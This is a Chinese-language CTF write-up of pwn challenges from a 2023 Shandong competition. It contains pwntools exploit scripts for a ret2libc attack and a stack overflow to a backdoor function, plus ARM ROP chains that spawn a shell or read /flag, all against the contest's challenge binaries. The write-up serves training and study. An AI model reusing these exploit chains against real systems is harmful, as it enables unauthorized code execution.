pwn2

return2libc,白给

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('libc.so.6')

rsetup('vt.jnxl2023.sierting.com',30454)

evgdb()

ret = 0x401230

rdi = 0x4011e3

puts = pltadd('puts')

got = gotadd('puts')

sl(b'9'0x18+p64(rdi)+p64(got)+p64(puts)+p64(0x4011e8))

addx = tet()

addx = getx64(0,-1)

libc = getbase(addx,'puts')

sys = symoff('system',libc)

binsh = libc + 0x00000000001d8698

sla(b'gift',b'1'0x18+p64(rdi)+p64(binsh)+p64(ret)+p64(sys))

pwn

c++题目,但是无所谓,没开canary肯定有栈溢出,直接开始尝试。除了输入int的不行,输入char字符串的应该可以溢出。有后门函数,直接狂溢出,注意栈对齐少一个push即可打通。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

#libset('libc-2.31.so')

rsetup('vt.jnxl2023.sierting.com',31712)

evgdb()

sl(b'1')

sl(p64(0x4025db))

sl(b'1')

sl(p64(0x4025db))

sl(b'2')

sl(b'0')

sl(p64(0x4025db))

sl(p64(0x4025db)*999)

#没开canary,给了后门,直接栈溢出

ia()

pwn3

一道arm pwn,最有意思。这里记录一下调试方法,非常非常重要。

p = process(["qemu-arm", "-g", "1234", "./pwn"])首先写这个作为p。运行脚本之后,在另一个终端执行以下命令

即可调试。

arm架构中,调用号3是read,4是write,5是open,0xb是execve。

r7用来存储系统调用号。

r0,r1,r2分别为三个参数。其中r2的控制较为麻烦,不过问题不大。

知道上面这些之后就好打了,给出orw和execve的打法exp。

execve

from pwn import *

import sys

# 指定 qemu 命令和需要运行的二进制文件

#context(arch='arm',log_level='debug')#context(arch='arm',log_level='debug')

qemu_command = "qemu-arm"

binary_file = "./pwn"

context(os='linux', arch='arm', log_level='debug')

p = process(["qemu-arm", "-g", "1234", "./pwn"])

p = process(["qemu-arm", "./pwn"])

# 使用 process 函数启动 qemu 和二进制文件

n2b = lambda x    : str(x).encode()

rv  = lambda x    : p.recv(x)

rl  = lambda     :p.recvline()

ru  = lambda s    : p.recvuntil(s)

sd  = lambda s    : p.send(s)

sl  = lambda s    : p.sendline(s)

sn  = lambda s    : sl(n2b(n))

sa  = lambda t, s : p.sendafter(t, s)

sla = lambda t, s : p.sendlineafter(t, s)

sna = lambda t, n : sla(t, n2b(n))

ia  = lambda      : p.interactive()

rop = lambda r    : flat([p32(x) for x in r])

uu64=lambda data :u64(data.ljust(8,b'\x00'))

# Attach GDB to the running process with additional commands

#pause()

sh = 0x0005c58c #/sh

sla(b'message',b'admin:a:ctfer')

sla(b'message',b'ctfer\x00')

sh = 0x408001cc

sh = 0x0005c58c

r0r4pc = 0x000236f4

r1 = 0x00059e48 # pop {r1, pc}

r4 = 0x000104bc # pop {r4, pc}

r3 = 0x0001014c # pop {r3, pc}

svc = 0x0001d230 # svc #0 ; pop {r7, pc}

callr3 = 0x000108d8

flag = 0x86000

r7 = 0x0001d234 #r7

r2 = 0x0005a484 # mov r2, r1 ; mov r4, r0 ; mov r5, r1 ; mov r1, r0 ; mov r0, #2 ; blx r3

orw = p32(0) + p32(r7) + p32(3) + p32(r0r4pc) + p32(0)*2 + p32(r1) + p32(0x86000) + p32(svc)#read /bin/sh

orw += p32(0xb) + p32(r1) + p32(0) + p32(r3) + p32(r0r4pc) + p32(r2) + p32(0x86000)*2 + p32(r1) + p32(0)+p32(svc)

sla(b'say something',b'/bin/sh\x00caaadaaaeaaafaaagaaahaaaiaaa'+orw)

sl(b'/bin/sh\x00')

p.interactive()

orw

from pwn import *

import sys

# 指定 qemu 命令和需要运行的二进制文件

#context(arch='arm',log_level='debug')#context(arch='arm',log_level='debug')

qemu_command = "qemu-arm"

binary_file = "./pwn"

context(os='linux', arch='arm', log_level='debug')

#p = process(["qemu-arm", "-g", "1234", "./pwn"])

p = process(["qemu-arm", "./pwn"])

# 使用 process 函数启动 qemu 和二进制文件

n2b = lambda x    : str(x).encode()

rv  = lambda x    : p.recv(x)

rl  = lambda     :p.recvline()

ru  = lambda s    : p.recvuntil(s)

sd  = lambda s    : p.send(s)

sl  = lambda s    : p.sendline(s)

sn  = lambda s    : sl(n2b(n))

sa  = lambda t, s : p.sendafter(t, s)

sla = lambda t, s : p.sendlineafter(t, s)

sna = lambda t, n : sla(t, n2b(n))

ia  = lambda      : p.interactive()

rop = lambda r    : flat([p32(x) for x in r])

uu64=lambda data :u64(data.ljust(8,b'\x00'))

# Attach GDB to the running process with additional commands

#pause()

sh = 0x0005c58c #/sh

sla(b'message',b'admin:a:ctfer')

sla(b'message',b'ctfer\x00')

sh = 0x408001cc

sh = 0x0005c58c

r0r4pc = 0x000236f4

r1 = 0x00059e48 # pop {r1, pc}

r4 = 0x000104bc # pop {r4, pc}

r3 = 0x0001014c # pop {r3, pc}

svc = 0x0001d230 # svc #0 ; pop {r7, pc}

callr3 = 0x000108d8

flag = 0x86000

r7 = 0x0001d234 #r7

orw = p32(0) + p32(r7) + p32(3) + p32(r0r4pc) + p32(0)*2 + p32(r1) + p32(0x86000) + p32(svc)#read

orw += p32(5) + p32(r0r4pc) + p32(flag)*2 +p32(r1) + p32(0) + p32(svc)#open

orw += p32(3) + p32(r0r4pc) + p32(3)*2 + p32(r1) + p32(0x87000) + p32(svc)#read,这里的r0可以是3或者7

orw += p32(4) + p32(r0r4pc) + p32(1)*2 + p32(r1) + p32(0x87000) + p32(svc)

#5是open

#4是write

#3是read

sla(b'say something',b'/bin/sh\x00caaadaaaeaaafaaagaaahaaaiaaa'+orw)

sl(b'/flag\x00')

p.interactive()

附上c-python调试方法

采用香山杯2023题目。

在开头加上代码

import sys

sys.path.append('./')

然后,确保python版本和库版本相同。

app.cpython-37m-x86_64-linux-gnu.so这里是37m也就是python3.7。

然后导入就可以运行了。调试的时候,使用代码如下。

p = process(["python", "./main.py"])

gdb.attach(p)

记得下断点到库里面的内容。

山东职业竞赛wp2023(arm、cpython)的更多相关文章

  1. 全国高校json数据包(复python解析代码)

    由于这段时间需要有关学校的三级联动插件,找了很久没有找到合适的,所以去教育部官网下载了一份全国普通高校名单(2019年), 这里附上解析该xls文件的代码 import xlrd import jso ...

  2. 应聘linux/ARM嵌入式开发岗位

    **************************************************************** 因为发在中华英才和智联招聘没有人采我所以我 在这里发布我的个人简历希望 ...

  3. Linux方向职业规划

    Linux方向职业分析 引言: 据了解,Linux普通网络管理人员的月薪大约5000元左右,负责编程的Linux软件工程师月薪大约在8000元到12000元之间,Linux嵌入式软件开发人员的月薪大约 ...

  4. STM32与LPC系列ARM资源之比较

    由于有周立公开发板的影响,LPC系列的开发板在工程师心目中一般是入门的最好型号之一.这次刚好有STM32的竞赛,正好将两者的资源进行比较一下(LPC系列以LPC213X为例). LPC213X包括LP ...

  5. 基于ARM的车牌识别技术研究与实现

    在云盘里包含了我本科毕业设计的全部资料和代码.主要涉及下面摘要中的几个部分.虽然系统无法实用,但是适合机器视觉和嵌入式方向的入门.希望能对有志从事相关方向的朋友有所帮助.本人现在在深圳从事机器视觉算法 ...

  6. 【转】Linux方向职业分析

    引言: 据了解,Linux普通网络管理人员的月薪大约5000元左右,负责编程的Linux软件工程师月薪大约在8000元到12000元之间,Linux嵌入式软件开发人员的月薪大约在12000元以上. 影 ...

  7. 安晓辉大神的感悟:如果你发现了自己的学习模式,愿意学并且能坚持,我觉得没什么能阻挡你征服软件世界的脚步(对于开发人员来讲,最大的风险是:在职业规划上没有延续性地乱跳槽。时刻要牢记在心的:培养自己的稀缺性) good

    从技术支持中途转战软件开发,如今从事编程工作已十多有余,2014年CSDN博文大赛编程语言组冠军.CSDN Qt论坛的版主安晓辉老师从今天开始,坐镇CSDN社区问答栏目的 第十四期,届时会接受广大网友 ...

  8. 解读ARM成功秘诀:薄利多销推广产品

    解读ARM成功秘诀:薄利多销推广产品 2013年07月04日 15:04   新浪科技 微博    我有话说(2人参与)   导语:美国电子杂志Slate周一发表署名 法哈德·曼约奥(Farhad M ...

  9. 安卓5.0宣告了ARM平台全面进入64位时代

    安卓5.0宣告了ARM平台全面进入64位时代 2014年10月份,安卓5.0正式版发布了,安卓5.0支持64位CPU,安卓5.0全面启用ART运行模式,在程序安装的时候,进行预编译,新的运行环境能够使 ...

  10. 山东理工oj--1912--IP地址(水题)

     IP地址 Time Limit: 1000ms   Memory limit: 65536K  有疑问?点这里^_^ 题目描述 2011年2月3日,国际互联网名称与数字地址分配机构(ICANN) ...

随机推荐

  1. 问题--C中结构体想要嵌套一个该结构体指针,但是系统无法识别该类型

    代码如下: typedef struct_Person{ char name[64]; int age; //Person* person; //这里会出现一个问题,由于Person是在末尾定义的,那 ...

  2. [转帖]Strong crypto defaults in RHEL 8 and deprecation of weak crypto algorithms

    https://access.redhat.com/articles/3642912   TABLE OF CONTENTS What policies are provided? Removed c ...

  3. 使用Grafana监控Nacos的简单过程

    使用Grafana监控Nacos的简单过程 背景 与kafka一样,想同期监控一下nacos. 发现nacos跟minio等一样都有对应的 metrics的暴露接口. 所以这边简单使用一下. stud ...

  4. [转帖]Oracle客户端与Oracle数据库兼容矩阵

    https://www.cnblogs.com/kerrycode/p/17666025.html Oracle客户端与Oracle数据库之间是有兼容支持关系的,有些低版本的Oracle Client ...

  5. [转帖]使用 TiUP 部署运维 TiDB 线上集群

    https://docs.pingcap.com/zh/tidb/stable/tiup-cluster 本文重在介绍如何使用 TiUP 的 cluster 组件,如果需要线上部署的完整步骤,可参考使 ...

  6. [转帖]一个小操作,SQL 查询速度翻了 1000 倍

    https://tidb.net/book/tidb-monthly/2022/2022-04/usercase/sql-1000 背景介绍​ 某一天早上来到公司,接到业务同学反馈,线上某个SQL之前 ...

  7. [转帖]Linux性能测试之unixbench

    https://www.modb.pro/db/487945 大家好,昨天为大家带来了一篇关于在Linux下性能测试的文章<性能测试之LTP>,今天继续为大家推荐系列工具之unixbenc ...

  8. fio test 简单查看一些系统的io性能结果

    简单测试的脚本: echo "本次测试测试128k 16k 8k 1k 的 顺序读写 随机读写性能,每个脚本耗时约30s, 总计耗时大约8min左右完成: " fio -name= ...

  9. 【原创】linux为什么不是实时操作系统

    一.什么是实时操作系统(RTOS)? 可参见本博客之前的文章: 什么是实时 实时的分类 常见的RTOS latency和jitter 总结一下,实时其实说的是系统响应事件需要的时间的确定性,时间必须确 ...

  10. Spring Cloud 系列:基于Seata 实现 XA模式

    https://seata.io/zh-cn/docs/user/mode/xa https://seata.io/zh-cn/docs/dev/mode/xa-mode XA 规范 是 X/Open ...